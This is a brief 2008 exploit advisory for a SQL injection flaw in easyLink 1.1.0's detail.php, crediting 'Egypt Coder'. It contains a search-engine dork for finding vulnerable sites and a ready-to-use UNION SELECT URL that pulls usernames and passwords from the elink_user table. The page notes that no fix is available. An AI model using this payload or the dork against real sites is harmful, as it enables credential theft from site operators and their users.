easyLink 1.1.0 (detail.php) Remote SQL Injection Vulnerability

2008-09-19 23:01:03

================================================================================
easyLink V1.1.0 (detail.php) Remote SQL Injection Vulnerability
================================================================================



Discovered By: Egypt Coder

home : WWW.Sec-Area.com

Mail: [email protected]



Dork: Engine powered by easyLink V1.1.0.



Exploit :


http://localhost/links/detail.php?act=show&cat=1+union+select+1,2,concat_ws(0x3a,user,passwort),4,5+from+elink_user


Greets rUnViruS, Error Code, H666p , Fear Master , ProViDoR

#

Fixes

No fixes

In order to submit a new fix you need to be registered.